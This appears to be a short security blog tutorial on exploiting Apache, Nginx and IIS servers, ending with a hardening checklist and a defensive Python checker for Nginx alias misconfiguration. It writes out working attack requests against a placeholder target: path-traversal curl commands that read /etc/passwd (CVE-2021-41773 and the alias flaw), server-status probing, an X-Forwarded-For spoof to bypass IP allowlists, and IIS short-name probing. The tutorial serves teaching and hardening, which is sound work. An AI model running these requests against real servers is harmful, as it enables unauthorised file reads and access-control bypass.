
Server Exploitation — Apache, Nginx & IIS Vulnerabilities

Anuj Singh (Admin), 31 March 2026

Web Server Exploitation

Web servers are the front door of the internet. Apache, Nginx, and IIS run 95%+ of all websites.

Apache Vulnerabilities

Directory Traversal (CVE-2021-41773)

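curl -s "http://target/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
# Reads /etc/passwd by traversing directories: the encoded dot segments (%2e) slip past path normalization.
# CVE-2021-41773 affects Apache 2.4.49; the 2.4.50 fix was incomplete (CVE-2021-42013), so upgrade to 2.4.51 or later.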

Server Status Exposure

curl http://target/server-status
# Reveals active connections, IPs, URLs being accessed

Nginx Vulnerabilities

Misconfigured Alias

# If configured as:
location /files {
    alias /data/files/;
}
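# Request: /files../etc/passwd
# The location has no trailing slash but the alias does, so the leftover "../" is appended to the alias path.
# Reads files outside the intended directory!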
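
A defensive check for the alias pattern above, as an added example that is not part of the original article. The function names and the sample configuration are constructed for illustration, and the regex handles only simple prefix locations with no nested blocks.

```python
import posixpath
import re

# Constructed sample config: the first block is the pattern from the article,
# the second is the corrected form (location and alias both end in "/").
SAMPLE_CONF = """
server {
    location /files {
        alias /data/files/;
    }
    location /static/ {
        alias /data/static/;
    }
}
"""

# Prefix locations only (no "=", "~" or "~*" modifier) that contain an alias directive.
LOCATION_ALIAS = re.compile(
    r"location\s+(?:\^~\s+)?(?P<prefix>/[^\s{]*)\s*\{"
    r"[^{}]*?\balias\s+(?P<alias>[^;\s]+)\s*;")

def resolve(prefix, alias, uri):
    """Mimic nginx alias mapping: swap the matched location prefix for the alias path."""
    return posixpath.normpath(alias + uri[len(prefix):])

def find_off_by_slash(conf_text):
    """Return (prefix, alias, escaped_path) for each location whose prefix lacks
    a trailing slash while its alias has one."""
    findings = []
    for m in LOCATION_ALIAS.finditer(conf_text):
        prefix, alias = m.group("prefix"), m.group("alias")
        if alias.endswith("/") and not prefix.endswith("/"):
            # "<prefix>../x" still matches the prefix, and the leftover "../x"
            # is appended to the alias, stepping one level above it.
            probe = resolve(prefix, alias, prefix + "../probe")
            findings.append((prefix, alias, probe))
    return findings

if __name__ == "__main__":
    for prefix, alias, probe in find_off_by_slash(SAMPLE_CONF):
        print(f"location {prefix} -> alias {alias}: {prefix}../probe maps to {probe}")
        print(f"  fix: location {prefix}/ {{ alias {alias}; }}")
```

With the article's configuration, /files../etc/passwd resolves to /data/etc/passwd, so the escape reaches one level above the alias target. Ending the location prefix with a slash (location /files/) closes it.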

Header Injection

curl -H "X-Forwarded-For: 127.0.0.1" http://target/admin
# Bypasses IP whitelist restrictions when the server trusts the client-supplied X-Forwarded-For header

IIS Vulnerabilities

Short Name Scanning

# IIS reveals 8.3 filename format
http://target/secret~1.txt   # Exposes "secret_document.txt"

Server Hardening Checklist

  • ✅ Disable directory listing
  • ✅ Remove version info from headers
  • ✅ Disable unnecessary modules
  • ✅ Apply security patches immediately
  • ✅ Configure proper CORS headers
  • ✅ Enable HTTPS with HSTS
  • ✅ Set secure cookie flags
  • ✅ Implement rate limiting
